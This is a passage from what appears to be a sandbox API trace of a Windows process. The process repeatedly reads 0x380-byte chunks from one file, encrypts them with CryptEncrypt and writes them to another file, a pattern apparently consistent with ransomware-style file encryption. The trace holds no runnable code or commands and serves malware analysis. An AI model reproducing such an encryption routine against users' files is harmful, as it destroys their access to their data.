lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.294] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.294] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.295] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.295] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.295] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.295] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.295] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.296] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.296] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.296] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.296] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.296] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.296] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.297] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.297] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.297] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.297] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.297] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.297] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.298] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.298] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.298] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.298] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.298] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.298] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.299] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.299] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.299] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.299] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.299] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.299] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.300] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.300] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.300] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.300] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.300] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.300] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.301] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.301] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.301] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.301] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, 